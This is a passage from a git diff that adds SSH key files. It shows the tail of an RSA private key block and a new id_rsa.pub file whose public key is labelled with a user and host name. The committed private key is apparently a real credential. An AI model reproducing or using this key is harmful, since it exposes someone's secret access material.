+NHZ6nWlt0BbST3wN0pyTp6cqtZ0qqfSpZCVRegeQW5ENR9NaigDX6RADKRnms46J +ziDSZAECgYEA0WBDY47CA9Ej0Y2zBcV3x03cznSnxr7BVty32xbnNgxGF5jNUDdU +E2JwJs86sV75VV0fpgrbN45lBV/2ImefrPr4kJAIL2J4eyVdOTTT/DO9Tuw6NP8R +AYMZOzOlgFjx3arnjlOK5AicFseWFCXvezuAMPcGpImgw7xHHM3RcFcCgYEAxGa2 +T+J119HWf15kN7bx5RaUl9J4DvvE5oHtA7zsMPO2fRpfwXAb8yKwIXfZ7186frPb +jo3ZQykcPuJ3MldvTWEuUhY5W1HSF1sBJOPZHuRfQicv8Uj4Y1kWltQf4Ikb3Uyh +T0fZJul4HkPAo/Q65zIAtJ9tWukAP/lmnwO9VXUCgYEAiY62F4WmH/3ai4WOFX+b +5xxXsmhgBiozOc8/F7jfZNoBfuVMFqSTHz0wM784b2nXY+cPsPY2+jQaWMKoIgh0 +lqA4iDmotwD56OYubjQwBeU0PdLjlwfw805fWE7hMAa/uQPcp9xpRtIFQs4T4t7d +jNgVq5XQDm/BaHedPOZX8HcCgYEAuKpu31vqO7wUt/vTtUMx3JpHqxz9P/FgqPAf +H/WiC0EMJEMJKAO2c/z4qO9dHiJnCL0qQraDQw/DfClJtC7b+2DVwd8dnQyowscR +o1MNUmueWcAo5vEag6c/gx/+vQuOBJ1JyxaeSmUZSTOhTUeVns64NRz2IJWWY5Cn ++fn1KwUCgYEAjYYeQX/W+2r8SFipPQQi/36EqLPwko58C/sbJR0gySP6El7hNQRt +Sdmd9hfMXRR+VCZWmmzb6T4fc80XxteI9eANkZ7xhNuQe11EDvPqmc9WSF0s+l1T +eQnkt+an7Qv2prDSU6d1KlOrOuCXU8IhbkuffvRSYXwK9T79bTG8iIQ= +-----END RSA PRIVATE KEY----- diff --git a/ssh/id_rsa.pub b/ssh/id_rsa.pub new file mode 100755 index 0000000..f69cef1 --- /dev/null +++ b/ssh/id_rsa.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgobUO2MxccMl8Xn1jmc7tiXfx+SNEvUtCEXtFkpsZJxYE0hZ+gBLTCt3fBSd3lgy0h6IGP3wf5XwgSfQKEADEZ8deqqaZiVToAERIg2hv6HvQGeZTCJFtGcDrijd335zPZPxgt/7Wnv//9nwsDxT7utL6S8q+1gJD2WUMDG1t7f0LEKzYcBJqbdTpUCur1J1KqmHky50FpiFrHHhXxUN1cSEbamKaWHx7vN09nwBhtgssOGpi137Cf1rMtc9DfD+8L4+fi1pQFieURENjjm9pWw92dH5qj1yQwtRLoTAlVCaAzMHbLI0Js9Bi9E8vSvGgay18KaaNjcTM6HqQQDrD nlknguyen@NN-Ubuntu